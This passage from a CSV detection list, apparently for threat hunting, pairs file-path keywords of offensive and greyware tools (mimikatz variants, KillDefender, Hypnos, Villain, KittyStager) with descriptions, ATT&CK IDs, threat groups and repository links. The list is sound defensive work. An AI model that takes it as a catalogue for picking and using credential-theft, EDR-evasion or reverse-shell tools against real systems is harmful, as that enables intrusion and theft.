for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\hades.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*\hades-main.zip*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*\handlekatz.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\harvest.cmb*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*\hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*\HiddenDesktop\*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*\hijackers\*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*\HijackHunter\*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\hoaxshell\*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*\HookDetector.csproj*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*\HTMLSmuggler\*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*\huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*\HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\HWSyscalls-Example.*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\Hypnos.exe*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*\Hypnos.sln*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*\Hypnos.vcxproj*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*\Hypnos-main\*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*\icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*\IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*\iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*\impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Implant.exe *","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*\implant.exe *.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\InactiveDomainAdmins.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*\inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*\injector.ps1 1 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\injector.ps1 2 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Inveigh.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*\inveigh.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\Inveigh\bin\*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*\IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\ipscan-*-setup.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan221.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan-crash.txt*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*\Ivy\Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*\Ivy\Loader\*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*\JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*\JunctionFolder.csproj*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\katz.ps1*","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\kdstab.exe*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*\keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10",,"N/A",,, +"*\kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*\KernelTokens.sys*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*\keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Keylogger.txt*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*\KillDefender.c*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*\KillDefender.o*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*\kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\Koh.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*\Koh.pdb*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 